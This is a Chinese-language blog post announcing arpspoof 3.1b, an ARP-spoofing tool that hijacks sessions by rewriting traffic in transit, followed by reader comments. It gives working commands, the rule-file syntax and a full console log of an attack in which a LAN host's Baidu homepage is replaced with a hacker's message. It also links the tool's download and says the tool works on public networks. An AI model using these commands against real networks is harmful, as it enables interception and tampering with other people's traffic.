arpspoof 3.1b正式发布

2006/12/16 9:38 | 鬼仔 | 工具收集 | 占个座先

信息来源:CN.Tink

主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:\arpspoof\Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success… # 利用程序自动生成的规则文件,就能搞定

F:\arpspoof\Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30

  • Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
  • Parsing rul <HEA ==> Hack by cooldiyer<noframes>

    • [+] Loaded 2 rules… # 共加载了两条规则,如果文件格式不对,程序在这里会中断

  • Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包

    • [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串

  • Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是

    • [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # …………

  • Forwarding untouched packet of size 62

    • [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

  • Forwarding untouched packet of size 60

    • [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

  • Forwarding untouched packet of size 399

    • [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

  • Forwarding untouched packet of size 60

    • [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
    Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”

  • Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)

    • [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

  • Forwarding untouched packet of size 1474

    • [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

  • Forwarding untouched packet of size 60

    • [+] Caught 202.108.22.43:80 -> 192.168.0.108:4304

  • Forwarding untouched packet of size 237

    • [+] Caught 192.168.0.108:4304 -> 202.108.22.43:80

  • Forwarding untouched packet of size 60

    • [+] Reseting ….. # Ctrl+C,程序自动恢复受骗主机的ARP缓存
    [-] Sleep 5s ………… # 5秒退出
    __________________________________________________________________________________

    其它说明:
    arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
    可保存数据到文件,
    arpspoof 192.168.0.1 192.168.0.108 80 2 1
    只显示数据
    被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
    需要说的是程序在公网下照样使用,我已经解说过了,不再举例………
    规则文件的使用可以看程序的书写,本程序开放源代码
    希望测试出更多Bug, 我努力更新。。
    By CoolDiyer 2006-11-12
    arpspoof.3.1.zip

    Tags:

    相关日志

    楼被抢了 6 层了... 抢座Rss 2.0或者 Trackback

    • 鬼仔 | 2006-12-16 01:42 | #

      我也不清楚可以修改多大的数据,你测试下

      回复该留言
    • tangbuhu | 2006-12-16 10:03 | #

      cain也能做到这种效果。dns欺骗,当然原理不一样了。一个是欺骗,一个是劫持更改数据
      这个东东偶还没有测试过,不知道可以修改的数据能有多大?

      回复该留言
    • foaoo | 2007-07-27 11:25 | #

      鬼仔,下载不了啊,麻烦放个可用的下载链接上来。

      回复该留言
    • foaoo | 2007-07-28 11:09 | #

      不行啊,根本不好用嘛。。。

      我用arpspoof /n根本什么反应都没有,是不是要装什么驱动啊?2.1版都有个驱动文件的。pcap3.0我也装了的。。

      回复该留言
    • 鬼仔 | 2007-07-29 04:22 | #

      那个链接没问题
      装最新的WinPcap

      回复该留言
    • 我是游客 | 2008-12-30 15:28 | #

      请问:源代码在Windows下编译需要哪些库,编译时注意什么?
      我编译时说要pcap.h文件,到哪里下载?还需要什么lib或dll之类的?谢谢。

      回复该留言

    发表评论